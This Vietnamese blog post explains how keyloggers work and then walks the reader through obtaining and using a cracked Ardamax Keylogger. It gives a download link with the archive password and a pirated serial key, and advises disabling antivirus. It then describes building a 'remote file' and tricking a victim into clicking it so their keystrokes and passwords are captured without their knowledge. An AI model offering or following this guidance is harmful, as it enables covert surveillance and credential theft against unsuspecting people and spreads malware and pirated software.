Keylogger là một chương trình máy tính ban đầu được viết nhằm mục đích theo dõi và ghi lại mọi thao tác thực hiện trên bàn phím vào một tập tin nhật ký (log) để cho người cài đặt nó sử dụng. Vì chức năng mang tính vi phạm vào riêng tư của người khác này nên các trình keylogger được xếp vào nhóm các phần mềm gián điệp.
2.Keylogger hoạt động như thế nào?
Một khi keylogger được cài đặt trên máy tính, nó bắt đầu hoạt động trong background (chế độ ẩn - stealth mode) và nắm bắt tất cả các phím tắt của nạn nhân trên máy tính đó. Hãy lấy một ví dụ nhỏ: nạn nhân đi vào http://www.gmail.com và gõ "username" và "password" của họ để đăng nhập. Keylogger âm thầm ghi lại những tổ hợp phím và lưu trữ chúng trong các bản log. Những bản log khi mở ra cho thấy "username" và "mật khẩu" đã nắm bắt đc và cũng sẽ cho bạn biết rằng họ đã gõ vào trang đăng nhập gmail. Một số loại keylogger không những ghi lại thao tác bàn phím mà còn ghi lại cả các hình ảnh hiển thị trên màn hình (screen) bằng cách chụp (screen-shot) hoặc quay phim (screen-capture) thậm chí còn ghi nhận cách con trỏ chuột trên máy tính di chuyển.
3.Các loại keylogger
1-Keylogger cứng- Một plug-in thiết bị hoặc một mạch phần cứng có thể được sử dụng như một công cụ keylogger. Một trong hai có thể đăng nhập vào tất cả bộ nhớ bên trong của các hoạt động bàn phím của người dùng.
2-Keylogger mềm-phần mềm keylogger được cài đặt trên máy tính nạn nhân để làm việc. Ở bài này mình đag nói về keylogger mềm
4.Sau khi cài đặt keylogger...nạn nhân có thể biết đến sự hiện diện của nó ko?
Nạn nhân sẽ không bao giờ đến để biết về sự hiện diện của các keylogger trên máy tính của anh / cô ấy. Điều này là bởi vì, một khi cài đặt keylogger sẽ chạy trong chế độ ẩn tổng số. Không giống như các chương trình khác, nó sẽ không bao giờ xuất hiện trong start menu, start-up, program files, add/remove programs and task manager. Vì vậy, các nạn nhân không có cách nào có thể xác định sự hiện diện của nó trên PC. Nhưng nếu họ khôn ngoan, họ có thể scan system bằng 1 phần mềm antivirus nào đó hoặc cũng có thể nhìn thấy trong process và họ sẽ đá bạn ra và bạn trở thành người ngu ngốc
5.Loại keylogger nào tốt nhất
Theo kinh nghiệm mình dùng thì Ardamax Keylogger là loại dùng khá đc và cũng dễ để đọc bản log
Chú ý : Đã update link download Ardamax Keylogger 3.9.3 vào bài viết thay vì bản 3.8.5 như trước đây ( pass giải nén kist.vn)
Link download Ardamax Keylogger 3.9.3: (pass giải nén là kist.vn)
https://mega.co.nz/#!NwhFgLxA!C785iiz_VXphvCzDHNRrCQfAVFMQ0OKMfeECLUhsSDc (2.0 MB)
Lưu ý: nên tắt antivirus khi cài hoặc bạn cũng có thể cài trên máy ảo
Sau đây là hướng dẫn cài đặt bằng hình ảnh:
Name: Popescu Marian
Serial: 083A-E649-5E15
Vậy là xong. Còn bây giờ thì mình sẽ hướng dẫn tạo Keylogger Remote File ( file mà bạn sẽ gửi cho victim)
Vậy là đã tạo xong file keylog. Giờ chỉ cần gửi nó qua victim và lừa họ click vào thế là họ đã nhiễm keylog của bạn
Còn đây là file để remove con keylog ra khỏi máy
Link: https://mega.co.nz/#!dh4iyBxQ!NVvHRjdBGHmVY-FEy4bkOX49b14FjVnRoUSkiIyWm5U
Bài viết: Hướng dẫn chi tiết về cách cài đặt và sử dụng keylogger
Nguồn Zing Blog
0 nhận xét
Đăng nhận xét